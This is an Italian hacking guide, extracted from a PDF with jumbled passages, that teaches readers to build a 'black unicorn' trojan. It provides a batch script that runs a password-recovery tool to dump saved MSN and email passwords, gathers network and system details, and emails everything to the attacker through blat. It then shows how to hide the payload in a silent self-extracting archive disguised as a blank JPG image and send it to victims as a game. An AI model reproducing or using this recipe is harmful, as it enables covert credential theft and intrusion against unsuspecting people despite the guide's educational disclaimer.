1

5. L’autore Angelo Nappi non si assume responsabilità delle informazioni assimilate e delle azioni che ne possono derivare. Tutte le informazioni sono a scopo educativo/informatico.9. Qualunque atto che vada contro la legge informatica n23 art1.it jamy8702@hotmail.2. Quest’opera è stata rilasciata sotto la licenza Creative Commons Non mi assumo alcuna responsabilità riguardo l’uso di questa guida.it MSN IO ODIO MESSENGER MSN (KILL MSN) Disclaimer Il seguente libro è allo scopo illustrativo e informatico.Curato da Angelo (KiLL MSN) Nappi angelo8702@libero.3.12. Leggendo questa guida voi lettori vi 2 .6.8.11.4.7.10.13 è punibile e perseguibile Penalmente Le azioni riportate nel documento sono state testate su macchine di mia stessa proprietà.

ip. la vittima è indotta a far entrare il programma nella città. usato dal pirata per inviare istruzioni che il server esegue.server.e quant’ altro) ovviamente senza che l’antivirus possa rilevarlo come file “dannoso” Articolo preso da wikipedia Un trojan o trojan horse (dall'inglese per Cavallo di Troia). È proprio il celare le sue reali "intenzioni" che lo rende un trojan. inviato attraverso messaggistica istantanea o e-mail a prelevare le informazioni della vittima (password. ossia. composti generalmente da 2 file: il file server. Esistono anche alcuni software legali. fuor di metafora. come con il mitico stratagemma adottato da Ulisse. ed un file client. In questo modo. ad eseguire il programma. dato che i cracker amano inserire queste "trappole" ad esempio nei videogiochi piratati.assumerete tutte le responsabilità di quello che farete con ciò spiegato in questo documento The Black Unicorn Introduzione Questa guida è stata realizza per illustrare semplicemente attraverso pochi passi come creare un virus o meglio un Trojan invisibile agli antivirus. Spesso è la vittima stessa a ricercare e scaricare un trojan sul proprio computer. è un tipo di malware. In genere col termine Trojan ci si riferisce ai trojan ad accesso remoto (detti anche RAT dall'inglese Remote Administration Tool). L'attribuzione del termine "Cavallo di Troia" ad un programma o. L’ unicorno nero riesce semplicemente attraverso l’apertura di un file. come GoToMyPC o PCAnywhere. è dunque l'utente stesso che installando ed eseguendo un certo programma. comunque. ma che non sono dei cavalli di Troia poiché l'utente è consapevole della situazione. inconsapevolmente. I trojan non si diffondono autonomamente come i virus o i worm. quindi richiedono un intervento diretto dell'aggressore per far giungere l'eseguibile maligno alla vittima. installa ed esegue anche il codice trojan nascosto. con funzionalità simili ai trojan. che viene installato nella macchina vittima. Vengono in genere riconosciuti da un antivirus aggiornato come tutti i malware. ad un file eseguibile.contatto msn. Deve il suo nome al fatto che le sue funzionalità sono nascoste all'interno di un programma apparentemente utile. è dovuta al fatto che esso nasconde il suo vero fine. Questo nuovo trojan da me progettato ha preso il nome di “unicorno nero”. che in genere sono molto richiesti. Se il trojan in questione non è ancora stato scoperto 3 .

il trojan attacca il nostro sistema esponendosi al sistema e all’utente come un software utile al nostro scopo contenendo però codice nocivo in grado di compromettere l’intero sistema. come probabile malware. mentre per unire due semplici programmi solitamente il lamer della situazione si arma di un blinder o merge e compie il suo sporco lavoro. e opzioni per nascondersi meglio nel sistema operativo. Un bravo programmatore invece potrebbe eludere la difesa. messaggistica istantanea e in tutti in quei casi dove la vittima è “costretta” ad eseguire il file infetto. con la scansione euristica. Il trojan si espande tramite allegato posta elettronica. Il trojan è specialmente utilizzato per iniziare la riproduzione di un worm o durante l’infezione del computer tramite Blackdoor. 4 . “difficilmente il vostro antivirus non si accorgerà se un eseguibile è effettivamente un trojan. specie se viene creato tramite programmi presenti su internet. utilizzando tecniche di Rootkit. Col passare del tempo il trojan ha assunto una forma quasi perfetta: viene distribuito alle vittime sotto forma di eseguibili in grado di cracckare. A seguito vi riporto uno spezzone di testo prelevato dall’ottimo libro di murder code “The black book of infernet” al capitolo 7 Trojan “proprio come i greci si nascosero dentro un cavallo di legno per poi attaccare il cuore della città di Troia. formando appunto Botnet. ma è comunque raro imbattersi in situazioni del genere…. Un antivirus scarso difficilmente riconoscerà l’infezione. I Trojan di nuova generazione hanno molteplici funzionalità. Spesso i trojan sono usati come veicolo alternativo ai worm e ai virus per installare delle backdoor o dei keylogger sui sistemi bersaglio. All'incirca negli anni successivi al 2001 o 2002 i trojan incomiciarono ad essere utilizzati sistematicamente per operazioni criminose. Un trojan può contenere qualsiasi tipo di istruzione maligna. è possibile che esso venga rilevato. Lo scopo? Quello di nascondere file incriminati dentro un eseguibile facendo in modo che non venga riconosciuto da un sistema di protezione. quali connessioni tramite IRC bot. in particolare per inviare messaggi di spam e per rubare informazioni personali quali numeri di carte di credito e di altri documenti o anche solo indirizzi email.dalle software house degli antivirus.

full.zip&95548550 estrarre il file solamente blat.“NON E’ VERO OGGI E’ POSSIBILE ATRRAVERSO L’UNICORNO NERO” L’ unicorno nero si nasconde dietro un file spesso un immagine bianca ma che verrà aperto automaticamente come un eseguibile in modo che la vittima nn si accorga di niente e neanche l’ANTIVIRUS ovviamente.net/utils/index. Ovviamente dopo un po’ di TEORIA passiamo adesso alla …….net/project/downloading.. INIZIAMO….html consiglio di scaricarvi MessenPass per rubare password msn.php?group_id=81910&use_mirror=kent& filename=blat262.exe presente nella cartella full c) MsnPass (o MessenPass) http://www. FASE 1 Tutto ciò che vi occorre è: a) Quick Batch File Compiler vi consiglio di scaricarlo dall’emule con tanto di crack se no non funziona b) Blat da scaricare a quest indirizzo http://sourceforge. Mail PassView per password di posta elettronica oppure Ora vi spiegherò come creare il file da mandare alla vittima. Appena la vittima apre il file automaticamente ti arriverà la sua password di msn (se ce l'ha salvata nella schermata di login) 1° Aprire Quick Batch File Compiler 5 . PRATICA La guida deve essere seguita attentamente…in ogni suo passaggio in quanto ne potrebbe compromettere il suo giusto funzionamento….nirsoft.

txt echo USERPROFILE = %USERPROFILE% >> Test.txt del Mail.txt -to TuaMail cls del blat.it oppure mail.txt ipconfig /all >> Test.libero.alice. >> Test.exe <<fine CODICE>> anche questo nn copiare 3° Sostituire in "TuaMail" l'email dove vuoi ti arrivino le password.it basta informarvi 6 . e in smtp.it Password@tiscali. >> Test.txt echo. >> Test.txt echo USERDOMAIN = %USERDOMAIN% >> Test.txt netstat -na >> Test.txt echo.exe /stext Test.txt cls echo COMPUTERNAME = %COMPUTERNAME% >> Test.2° Copiarci dentro questo codice <<inizio CODICE>> ovviamente “inizio codice” nn bisogna copiarlo.exe del Test.txt cls @blat -install smtp.it il provider IN USCITA della posta della conessione che usa la vittima di solito è quasi sempre out.it cls @blat Test.txt echo. copiare solo quanto scritto giù @echo off mspass.tiscali.txt echo USERNAME = %USERNAME% >> Test.tiscali.

exe e Mail.exe in build 6° Scaricare MsnPass.exe 7 . MsnPass. Vi troverete nella sezione "Generale" 10° Inserire questo in "Percorso d'estrazione": C:\WINDOWS\system32 11° Inserire questo in "Esegui dopo l'estrazione": Mail.exe clikkate i 3 file e con il destro “aggiungi ad un archivio” DOVETE AVERE WINRAR SE NN L’HO AVETE LO DOVETE SCARICARE E INSTALLARE 8° Spuntare la casella cn scritto "Crea un archivio auto-estraente" 9° Andare in "Avanzati" e poi cliccare su "Modulo auto-estraente".exe e Blat (Presenti ad inizio discussione) 7° Creare un archivio con dentro i file del Blat.4° Cliccare in alto su "Project" e andare su "Options" selezionando poi "Ghost Application" 5° Compilare col nome di Mail.

Ora usciamo dalla cartella e rinominiamo la cartella “ciao” per semplicita e mettiamola sul desktop Una volta fatto cio andiamo in start poi su esegui e digitiamo “cmd” senza virgole alte Successivamente scriviamo sul command “cd desktop” e premiamo il tasto invio 8 .12° Andare nella sezione "Modalita" e selezionare "Nascondi Tutto" e "Sovrascrivi tutti i file già esistenti" 13° Cliccare "Ok" e poi create l'archivio 14° ovviamente se vogliamo le password di msn dovremo mettere all’inizio del codice mspass. UNA VOLTA FATTO CIO prendiamo il file setup (archivio ke abbiamo creato prima) e nuovamente stavolta cn il destro del mouse facciamo “aggiungi ad un archivio…” stavolta facciamo direttamente su ok e nella cartella si crereà un file con nome “setup” ma ovviamente in rar dentro il quale ce il vero setup.jpg” nella cartella creata così avremo la nostra bella immagine bianca.exe all’inizio del codice . Creiamo una nuova cartella ovviamente contenete solamente archivio auto-estraibile che abbiamo creato e rinominiamolo “setup” in modo da far sembrar + veritiera la cosa. da ricordare poi di creare l’archivio con il programma scelto 15° vi consiglio di mettere tutti i file in una cartella in modo da tenere tutto ordinato FASE 2 Adesso abbiamo creato il nostro trojan ma purtroppo è visibile all’antivirus ora vedremo come sarà possibile evitare tutto ciò.exe.exe se invece vogliamo le password dell’email dovremo sostituire mailpv. Allo stesso tempo andiamo sul paint presente in strart-accessori e non disegnamo nulla ma solamente salviamo come “ciao.

RAR per i meno pratici basta andare nella nostra cartella su a tutto in STRUMENTI-OPZIONI CARTELLA…VISUALIZZAZIONI-E TOGLIERE LA SPUNTA DA “NASCONDI LE ESTENZIONI PER I TIPI DI FILE CONOSCIUTI” Ora rinominiamo il nostro file “finale.JPG a .jpg” se avremo fatto tutto in modo coretto ci uscirà questa schermata Adesso se andiamo a vedere nella cartella ciao sul desktop sara stata creata un immagine col nome “finale” e se l’apriamo sarà un immagine bianca NON CI CREDERETE MA QUELLA FOTO è IL NOSTRO UNICORNO NERO IN GRADO DI CATTURARE PASSWORD FACENDOLA APRIRE ALLA NOSTRA VITTIMA BASTA DIRGLI CHE è UN GIOCO.Successivamente scriviamo “cd ciao” sarebbe la nostra cartella sul desktop E infine “dir” e inviamo dovremo avere questa schermata Ora scriviamo “copy /b ciao.rar” o nel nome che volete ora basta inviarlo alla vittima dicendo che è un gioco che circola o quello che cazzo volete 9 .jpg + setup.rar finale. Ma prima di questo Dobbiamo rinominare l’estenzione da .jpg” in “gioco.

Ovviamente è stato testato su mie macchine è funziona al 100% Se proprio avete l’esigenza di copiare i codici e gli indirizzi per scaricare i programmi ma non lo potete fare poiché questa guida è stata realizzata in formato .exe ke ovviamente lo aprira…. La vittima quando andra ad aprire il “gioco.computer.rar” si troverà di fronte a setup.it/da-pdf-a-doc-convertire-un-documento-pdf-in-undocumento-word-finito-1005.. KILL MSN (Angelo Nappi) angelo8702@libero.voi…… anche per msn tanto l’antivirus non lo rileva.html (almeno questo indirizzo lo dovrete copiare in internet mi dispiace) Spero che sia stato chiaro in questa breve guida e spero di ricevere tante e-mail per dubbi. chiarimenti. critiche e quant altro.it jamy8702@hotmail.alice. Basta aspettare un po e nella nostra e-mail che abbiamo indicato nel codice di prima ci arriveranno le sue password e i suoi account……….it 10 .pdf allora collegatevi a questo sito per trasformare la guida in file di testo o word http://aranzulla.